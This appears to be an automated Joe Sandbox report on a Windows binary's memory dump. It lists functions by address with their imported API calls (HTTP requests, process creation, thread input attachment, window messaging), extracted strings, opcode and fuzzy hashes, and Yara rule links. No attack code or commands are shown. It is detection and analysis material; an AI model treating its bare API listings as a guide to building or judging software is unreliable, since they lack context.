API String ID: 4194297153-14809454
Opcode ID: 31a3af1fbead480f4198a4b0ab121ef9e8b8b8494f72cb3ca38c9abeee2e82c9
Instruction ID: e78fa39975704a2ada22f09e206f2a6392684efcc33df73def741f2e6e61730e
Opcode Fuzzy Hash: 31a3af1fbead480f4198a4b0ab121ef9e8b8b8494f72cb3ca38c9abeee2e82c9
Instruction Fuzzy Hash: 2A316036A002099FCB00EB68CC85AFE77B4FF45310F188165E906D7295DB759E86EB51

Function 00F58F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F59014
GetDlgCtrlID.USER32 ref: 00F5901F
GetParent.USER32 ref: 00F5903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F5903E
GetDlgCtrlID.USER32(?), ref: 00F59047
GetParent.USER32(?), ref: 00F59063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F59066

Strings

ComboBox, xrefs: 00F58F9C
ListBox, xrefs: 00F58FD1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 98e40e093508c8ec5708c24d0768b87ef0a0fed2b37883e9c0a874fdb59de884
Instruction ID: dcfd75cde2348937b891a7db4ebcea5108a7eff3ba5a606987adc1f298723173
Opcode Fuzzy Hash: 98e40e093508c8ec5708c24d0768b87ef0a0fed2b37883e9c0a874fdb59de884
Instruction Fuzzy Hash: 43219574A10208BFDF05ABA0CC85EFEBB75EF45310F100255BA51972E1DB799819FB20

Function 00F5907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F590FD
GetDlgCtrlID.USER32 ref: 00F59108
GetParent.USER32 ref: 00F59124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F59127
GetDlgCtrlID.USER32(?), ref: 00F59130
GetParent.USER32(?), ref: 00F5914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F5914F

Strings

ComboBox, xrefs: 00F59087
ListBox, xrefs: 00F590BC

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a59e993e43c5297a6fa0bc742375be40fba915e2a114f4ee0f028a7a5c2272d3
Instruction ID: b9f1d1214d7acf803bec5fcaa7fa54d9f56ba2fd7cd26153daf8f32565c29d62
Opcode Fuzzy Hash: a59e993e43c5297a6fa0bc742375be40fba915e2a114f4ee0f028a7a5c2272d3
Instruction Fuzzy Hash: 1D21A175A00208BFDF05ABA4CC85EFEBB69EF45311F104155BA11972A1EB79981DFF20

Function 00F59163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00F5916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00F59184
_wcscmp.LIBCMT ref: 00F59196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F59211

Strings

list, xrefs: 00F591F3
smallicons, xrefs: 00F591D9
largeicons, xrefs: 00F591A5
details, xrefs: 00F591BF
SHELLDLL_DefView, xrefs: 00F59190

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 801dfde9ed9b18ccd3c7107f33cfa60179921630ec52c586bf76b6e7a009dd91
Instruction ID: d634b817ef399cf6941974d3aaa2c16595cb7517b70811ec2bf53b57a1cb5c4c
Opcode Fuzzy Hash: 801dfde9ed9b18ccd3c7107f33cfa60179921630ec52c586bf76b6e7a009dd91
Instruction Fuzzy Hash: 0E11273664C717FAFA183624EC06DE73B9CDB10331F200026FE00E00D1FEA1A9157A90

Function 00F788AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F788D7
CoInitialize.OLE32(00000000), ref: 00F78904
CoUninitialize.OLE32 ref: 00F7890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00F78A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00F78B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F92C0C), ref: 00F78B6F
CoGetObject.OLE32(?,00000000,00F92C0C,?), ref: 00F78B92
SetErrorMode.KERNEL32(00000000), ref: 00F78BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F78C25
VariantClear.OLEAUT32(?), ref: 00F78C35

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 6e92511ccb070a4c5c1ac41481926e29da2b7c6c3ea419ac043beb2c16ccb53f
Instruction ID: 87dfb536d67f9121f97ee35098fc049b7aad078494ad4f242b63700e0eb2171e
Opcode Fuzzy Hash: 6e92511ccb070a4c5c1ac41481926e29da2b7c6c3ea419ac043beb2c16ccb53f
Instruction Fuzzy Hash: A1C14A71608305AFD700DF18C88896BB7E9FF89358F00891EF5899B251DB75ED06DB52

Function 00F67990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F67A6C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 26887c9b2380a5bea5337bc57d8202ae1ae8eea79e0cc51eeb89dc5317ae33af
Instruction ID: d262f8e047ad0498fe5cbea757045ba3f9a6392d710d16115f7ac283b481b5f2
Opcode Fuzzy Hash: 26887c9b2380a5bea5337bc57d8202ae1ae8eea79e0cc51eeb89dc5317ae33af
Instruction Fuzzy Hash: 6EB1A271A083199FDB00EFA4C884BBEB7F4FF49329F244425E501E7291D778A941EB90

Function 00F611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F611F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F61204
GetWindowThreadProcessId.USER32(00000000), ref: 00F6120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F60268,?,00000001), ref: 00F6121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F6122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F60268,?,00000001), ref: 00F61245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F60268,?,00000001), ref: 00F61257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F6129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F612B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F612BC

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 48886b71c8d1a05f8f96848defa6248f8d6fc618ae546c978847bac48cda2af8
Instruction ID: a38728400fa736d0ffb618f355f38c4df8dcd68b14c92542eee5cc7ef85691d4
Opcode Fuzzy Hash: 48886b71c8d1a05f8f96848defa6248f8d6fc618ae546c978847bac48cda2af8
Instruction Fuzzy Hash: 1431AC75A0020CAFDB209F54ED99FBA37A9BF56325F144229F900C71A0E7749D44EB60

Function 00F0FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F0FAA6
OleUninitialize.OLE32(?,00000000), ref: 00F0FB45
UnregisterHotKey.USER32(?), ref: 00F0FC9C
DestroyWindow.USER32(?), ref: 00F445D6
FreeLibrary.KERNEL32(?), ref: 00F4463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F44668

Strings

close all, xrefs: 00F0FAA1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7cbb68f2e47e55572e4bc2f0494ea5f3163d2acae34c2fc83b7ede2efc67168d
Instruction ID: 35802368f4af92d74b24c90330e51e37f62c1acfb9e7c56a33eb133a4e91fa86
Opcode Fuzzy Hash: 7cbb68f2e47e55572e4bc2f0494ea5f3163d2acae34c2fc83b7ede2efc67168d
Instruction Fuzzy Hash: 75A18C31701212CFDB28EF14C995B69F764BF05710F5542ADE80AAB2A2DB34AD1AFF50

Function 00F5A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00F5A439), ref: 00F5A377

Strings

REGEXPCLASS, xrefs: 00F5A13C
CLASSNN, xrefs: 00F5A119
CLASS, xrefs: 00F5A0F6
TEXT, xrefs: 00F5A2AE
NAME, xrefs: 00F5A1A9
INSTANCE, xrefs: 00F5A285

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 5cb38db300282ee5eb086f4fce1fe6d099039c2387a9c9673457a18fa5966445
Instruction ID: 2846270d67d5a353700f61099f0c2ff829055be92459c04aeaeb2559bfbb1758
Opcode Fuzzy Hash: 5cb38db300282ee5eb086f4fce1fe6d099039c2387a9c9673457a18fa5966445
Instruction Fuzzy Hash: A591D931900605AACB08EFA0C892BEDFB74BF04315F548219DD59A7181DF3569ADFF91

Function 00F02E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00F02EAE

Part of subcall function 00F01DB3: GetClientRect.USER32(?,?), ref: 00F01DDC
Part of subcall function 00F01DB3: GetWindowRect.USER32(?,?), ref: 00F01E1D
Part of subcall function 00F01DB3: ScreenToClient.USER32(?,?), ref: 00F01E45

GetDC.USER32 ref: 00F3CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F3CD45
SelectObject.GDI32(00000000,00000000), ref: 00F3CD53
SelectObject.GDI32(00000000,00000000), ref: 00F3CD68
ReleaseDC.USER32(?,00000000), ref: 00F3CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F3CDFB

Strings

U, xrefs: 00F3CCD0

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 77433b3bd7be0cf575e6adc34e1bad4066bdca84627146b9b385440287adbe0f
Instruction ID: af6944ef0920ca7e8958b92e428922833499e3e8b810f99472302e11c1bf9c6a
Opcode Fuzzy Hash: 77433b3bd7be0cf575e6adc34e1bad4066bdca84627146b9b385440287adbe0f
Instruction Fuzzy Hash: 99718431900209DFCF219F64CC85AEA7BB5FF48370F14426AFD556A2A6D7319891FBA0

Function 00F71A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F71A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F71A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F71ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F71AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F71AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F71B10
InternetCloseHandle.WININET(00000000), ref: 00F71B57

Part of subcall function 00F72483: GetLastError.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F72498
Part of subcall function 00F72483: SetEvent.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F724AD

Strings

, xrefs: 00F71B01

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 4254d18ca9b0f7e8259e45712ec3ffdf576cca9a705a1b77e137f8a8b068043f
Instruction ID: 01677a5df28be0350d9174c85f2a6c30302bf606d914f5db72e0a11aee541c85
Opcode Fuzzy Hash: 4254d18ca9b0f7e8259e45712ec3ffdf576cca9a705a1b77e137f8a8b068043f
Instruction Fuzzy Hash: A54162B1901219BFFB118F54CC89FFE776CFB48354F008126F90996141E7749E58ABA1

Function 00F78C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F8F910), ref: 00F78D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F8F910), ref: 00F78D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F78ED6
SysFreeString.OLEAUT32(?), ref: 00F78F00

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: ee534f772997db8813efceda7a08ecbfb9743aff0f71cad984ed083cdf364cc0
Instruction ID: fdedab727f09226f48b9655d032712ab0614117a75aa493effb3b01095c71421
Opcode Fuzzy Hash: ee534f772997db8813efceda7a08ecbfb9743aff0f71cad984ed083cdf364cc0
Instruction Fuzzy Hash: A5F15971A00109AFCF04DFA4C888EEEB7B9FF49354F108059F909AB251DB71AE46EB51

Function 00F7F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F7F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F7FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F7FA7C
CloseHandle.KERNEL32(?), ref: 00F7FAAB
CloseHandle.KERNEL32(?), ref: 00F7FB22

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 29624c856eaf7465c8ac8a79fd60b8f8d99e0ecedd7c2e627004377b9702a328
Instruction ID: 2b0396e967fd27f51d847f0181753fb0c94a36d1bc43c5b5ca1b5455d50c37ff
Opcode Fuzzy Hash: 29624c856eaf7465c8ac8a79fd60b8f8d99e0ecedd7c2e627004377b9702a328
Instruction Fuzzy Hash: 57E1B0716043019FC714EF24C881B6ABBE1EF85364F14C56EF8999B2A2DB34DC49EB52

Function 00F64CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F63697,?), ref: 00F6468B

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F63697,?), ref: 00F646A4

Part of subcall function 00F64A31: GetFileAttributesW.KERNEL32(?,00F6370B), ref: 00F64A32

lstrcmpiW.KERNEL32(?,?), ref: 00F64D40
_wcscmp.LIBCMT ref: 00F64D5A
MoveFileW.KERNEL32(?,?), ref: 00F64D75

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 989484e1356c1215fefbdc081fba1a08693ad171876d0785d73a024106278947
Instruction ID: 52633cc68de1527a0a40702b1c4c764680abfe9d8865314bff4f1e9e796eb8b6
Opcode Fuzzy Hash: 989484e1356c1215fefbdc081fba1a08693ad171876d0785d73a024106278947
Instruction Fuzzy Hash: E15164B24083459BC764EBA0DC819DFB3ECAF84750F40092EB289D3151EF75B688DB66

Function 00F88645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F886FF

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: a5f79e3d52e4e9b201115e74b9cbd8b4ccfdb9ed6c3f11a4e000298c12408acf
Instruction ID: 5f105815270a96a4d5640a6f607b50e01d0c0de13434bf80a3ef68c5ab764de0
Opcode Fuzzy Hash: a5f79e3d52e4e9b201115e74b9cbd8b4ccfdb9ed6c3f11a4e000298c12408acf
Instruction Fuzzy Hash: 85518271900244BEEF20AB24CC89FED7BA5EB057A0FA04215F951E61E1DF75AD81FB50

Function 00F02B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F3C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F3C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F3C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F3C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F3C370
DestroyIcon.USER32(00000000), ref: 00F3C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F3C39C
DestroyIcon.USER32(?), ref: 00F3C3AB

Part of subcall function 00F8A4AF: DeleteObject.GDI32(00000000), ref: 00F8A4E8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 8742ee926a4fdccdbd3b69c2451971b6a1c5c559713756379646cb2eb3a605ab
Instruction ID: a9f9d661cf5247678361f37b8288558b4e73a9d29cfd56978c7bdfcc0e945dc4
Opcode Fuzzy Hash: 8742ee926a4fdccdbd3b69c2451971b6a1c5c559713756379646cb2eb3a605ab
Instruction Fuzzy Hash: BA513C71A00209AFDB24DF64CC45FAA7BB5EB54720F104529F942A72D0D770ED90FBA0

